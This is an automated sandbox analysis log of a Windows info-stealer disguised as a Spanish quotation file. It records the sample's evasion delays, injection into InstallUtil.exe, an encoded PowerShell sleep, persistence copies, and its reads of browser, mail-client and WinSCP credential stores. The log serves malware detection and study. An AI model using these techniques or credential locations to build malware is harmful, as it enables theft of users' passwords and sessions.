                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99656
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99436
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99328
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99108
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98994
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98843
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98733
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98624
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98496
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98373
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98265
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98155
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98046
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 97921
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 97812
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 97703
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 97577
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 97468
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 922337203685477
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeBinary or memory string: uZXcBOTUmSff6KMWyuBRLHC+oGXajbN1li8EW4fzl2rNahXCQs9g8+7AZeYtV+c16jczGyrk7pqAQlaA82QeMU1Troi6ziyJCWRnhGqeeesVYNXKcz8u17m7rig0NDnFrKd1HhtD96TdzGzsTnCI5vxSTlk+ON69Yhbd16UZ3oczV/VGKxpfHRfFCF18+yXFkH2YdFjJuL0dOpw7U4j5LvEF2MgOP7hdnh2UBT71S0iiKesTkgUEISx0OGDN5ugpZFEY
                Source: InstallUtil.exe, 0000000D.00000002.531950659.0000026E32928000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.531950659.0000026E32C2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBCx3lnyhgfSTQ8XHFM
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeBinary or memory string: tzSH+LibGm1z50zN+3ntZpUDSdVUVE9iUzVCf3ndDgaXbSmjhWmGlebrkD3o44OO7CDaZ9+P5Hg3rgaO9mw8nq9DY7br9y8nzQJwf/0OuilAhun8NR/GOYObKd5GFfudR8R+/d0xA11PgMqF8p6WRYjbrVtBNBNEQGnvA7nLGmj0KcU8c/d1UZtS7yfi4EXmUvWRRqpPloKJ+OON4LBXdoZM9FwYNSUlWX4z5Z1uy3g9qVqemU4Bxcn5KgyZdWgjGPVz
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeBinary or memory string: r6rzviPOb+23CQl/k3fDY6STPW5ph5G3rqb/zI47DHmlQg9IsjWL2EpSAsl3I8AdTgSnPamxEH2kawChGfsO48BtoBmpxlqblVNYc6bQkoLBP45spzCgWAXQvqHQ+sd3bI+kvhI4zyyVk/zl9ZUniT2vzr0JsXum1qcYoALiP56SF5I9TT4n4do7Ag2eKICbt8ERhV7BtW8dCEPEycgq71s9bSxQfnDeIG41WRmwmpy61V4seWULSJGLf34dfpx2FEng
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeBinary or memory string: wdfkFVVspgMbXX+UU8MwLVNl5Id0hWkWmiWwV8o95wQ3PwRViuFTnkYLJho1JZMNteG7Yy1JCtDEnEjxenYHWqtXVPv9yb/dnvswWe+6FkOCOzfKtSl+or0kJ/y8RkcEAGlvpAvS5FLlJtf8P4DXXnwysUluVH5i5j33g2ZenzN9eg463miXIXNrSpa45CF2JKv4oKsVduMq+aqqEMumWlp+9j2H+nU/jpbK/Vhvw75et2KfqMwXOH8E219YPDNrfSFO
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeBinary or memory string: +WHkbEIpDyIw1WuQdvXcrEm5gOseYtDrxgP9GuHh26dpvbFqv1+K/NGMjQEmuiX/KF6aNJBOZln3VCJR7mCUfWZBlxfgEIVKMxltdao8tb7WrcuqBpQ0ZlXA6fjU00h/p2DlsGkcKZugaTN3CaTSRyw58j7IvG/ZQ+yUSNSXX3Ge+MzWvA1s02ejM69W8arscg0WrS3+B3YEHBNChZU6xb3YZVdRV8yJUdZc3ucnwVJlYxBOngYlTy2sFTKhJCMGi13L
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeBinary or memory string: O13M87U2sFKgTW5V+6oawdLCWsFgPmjsgBlFigsFWDDQW7PLLTFWUr49OtCT6iNcNAnr85PnmA7/M47HrHvjCiIBiA/jKhDciTfCn4jKtKgeBowtzUPdFlLmjhSviS/pjbAWRjZLbWd1xf2jiqjrAHSusmBv4xwY4Ep3GmeWEsuoI6uJo69oG42sU3PUYg3tWdhPQB34qT9aCwRLRyU/1OuqagYgYb9GmS+3tCVKiQK1qFUrELuSchgfsBUVA7OjB0D4
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeBinary or memory string: fSgjHJSIoDB6OQWA10xpuc7sRuvZSPoR75m6A7rP25s9RCO/Rx4LbcmlpWsnIvmciVWhnP08OwGVkGuFG1rZRHqmZrQXAJy0Bgb8alJ7TMZLGN+MWAjWRwX28AmWXPT+N0gle7l2j0+FVBvIX2efyMUnr7+McnjoAyS8O+H7poBxuzgT6iPMnIfNOT6MJlR/HRZE/jfbFtbfnq4PkfQDVP14Oh6faDcduU1+u/1rWGu/Pi1ulv6QpKLr2y0DeXttycMk
                Source: KbWSe.exe, 0000000F.00000003.424009142.0000000000F3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeMemory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe base: 400000
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe base: 402000
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe base: 4C6000
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe base: AD4090A010
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess created: Base64 decoded start-sleep -seconds 10
                Source: C:\Users\user\AppData\Local\explorers.exeProcess created: Base64 decoded start-sleep -seconds 10
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess created: Base64 decoded start-sleep -seconds 10
                Source: C:\Users\user\AppData\Local\explorers.exeProcess created: Base64 decoded start-sleep -seconds 10
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeThread register set: target process: 4664
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQAwAA==
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess created: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe "C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe"
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                Source: C:\Users\user\AppData\Local\explorers.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQAwAA==
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeQueries volume information: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe VolumeInformation
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\explorers.exeQueries volume information: C:\Users\user\AppData\Local\explorers.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\explorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\explorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\explorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\explorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\explorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\explorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeQueries volume information: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\explorers.exeQueries volume information: C:\Users\user\AppData\Local\explorers.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\explorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\explorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\explorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\explorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\explorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\explorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeQueries volume information: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeCode function: 12_2_0140F184 GetUserNameW,

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec604ebb60.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec709bb7c0.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec604ebb60.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec709bb7c0.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec7091b788.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec70afb7f8.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec708cb750.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec70624338.12.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec7091b788.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec70624338.12.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec708cb750.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec70afb7f8.10.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000013.00000002.532200083.00000000031DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.530714621.0000000002AFC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.530884956.000000000316C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Hxpqwdnjsynypvjkzfile.exe PID: 3896, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: KbWSe.exe PID: 5992, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: Yara matchFile source: 00000013.00000002.532200083.00000000031DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.530714621.0000000002AFC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.530884956.000000000316C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Hxpqwdnjsynypvjkzfile.exe PID: 3896, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: KbWSe.exe PID: 5992, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec604ebb60.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec709bb7c0.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec604ebb60.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec709bb7c0.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec7091b788.9.unpack, type: UNPACKEDPE
